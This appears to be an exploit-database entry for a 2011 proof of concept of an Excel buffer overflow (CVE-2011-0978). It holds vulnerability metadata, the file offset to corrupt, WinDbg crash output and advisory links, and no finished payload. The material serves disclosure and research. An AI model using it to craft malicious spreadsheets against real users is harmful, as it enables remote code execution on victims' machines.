Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow PoC

2011-05-03 / 2011-05-04

Credit: webDEViL

Risk: High

Local: No

Remote: Yes

CVE: CVE-2011-0978

CWE: CWE-119

CVSS Base Score: 9.3/10

Impact Subscore: 10/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: Complete

Integrity impact: Complete

Availability impact: Complete

"""
This is a PoC for MS11-021/CVE-2011-0978
Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow
w3bd3vil[at]gmail[dot].com
twitter.com/w3bd3vil

Modify bits at file location 0x39E7

0:000:x86> r
eax=04dd6380 ebx=ffff5554 ecx=04ab5108 edx=00000000 esi=04ab4800 edi=ffff5554
eip=2f36a2fd esp=0021420c ebp=00214218 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
2f36a2d5 33d2            xor     edx,edx
2f36a2d7 53              push    ebx
2f36a2d8 8b5d18          mov     ebx,dword ptr [ebp+18h]
2f36a2db 891540cdfc2f    mov     dword ptr [EXCEL!DllGetLCID+0x32517 (2ffccd40)],edx
2f36a2e1 3b580c          cmp     ebx,dword ptr [eax+0Ch]
2f36a2e4 0f8d8e9c1a00    jge     EXCEL!Ordinal40+0x423f78 (2f513f78)
2f36a2ea 39551c          cmp     dword ptr [ebp+1Ch],edx
2f36a2ed 56              push    esi
2f36a2ee 57              push    edi
2f36a2ef 0f84a09c1a00    je      EXCEL!Ordinal40+0x423f95 (2f513f95)
2f36a2f5 395514          cmp     dword ptr [ebp+14h],edx
2f36a2f8 7f27            jg      EXCEL!Ordinal40+0x27a321 (2f36a321)
2f36a2fa 8b4010          mov     eax,dword ptr [eax+10h]
2f36a2fd 8b0498          mov     eax,dword ptr [eax+ebx*4] ds:002b:04dab8d0=????????
2f36a300 3bc2            cmp     eax,edx
2f36a302 7425            je      EXCEL!Ordinal40+0x27a329 (2f36a329)
2f36a304 0fb738          movzx   edi,word ptr [eax]
2f36a307 8d4c3f02        lea     ecx,[edi+edi+2]
2f36a30b 51              push    ecx
eax here points to location in the file 0xFB4.
0:000:x86> dd eax
04dd6380  0376ec80 04dd02b0 04dd0330 04dd0318
04dd6390  04dd0380 04dd0398 04dd03b0 04dd03c8
04dd63a0  04dd03e0 00000000 00000001 00000001
04dd63b0  00000001 00000001 00000001 00000001
04dd63c0  00000001 00000001 00000001 00000000
04dd63d0  00000000 00000000 00000000 00000000
04dd63e0  00000000 00000000 00000000 00000000
04dd63f0  00000000 00000000 00000000 00000000
0:000:x86> dd 0376ec80
0376ec80  00630009 0061006c 00730073 006f0077
0376ec90  006b0072 eaf10000 00770009 00720061
0376eca0  0075006d 00200070 00350023 eaf10000
0376ecb0  0283eb30 6666ce60 0283eb40 6666c960
0376ecc0  0283eb4c 6666c960 0000f80c 00000000
0376ecd0  00006338 00000000 00000001 00000000
0376ece0  0283eb98 6666ce60 0283eba4 6666c960
0376ecf0  0283ebb0 6666c960 00000000 00000000

webDEViL

References:

http://zerodayinitiative.com/advisories/ZDI-11-042/

http://www.vupen.com/english/advisories/2011/0940

http://www.securitytracker.com/id?1025337

http://www.microsoft.com/technet/security/Bulletin/MS11-021.mspx

http://secunia.com/advisories/43232

http://secunia.com/advisories/39122

http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-microsoft

http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:12439

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow PoC

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.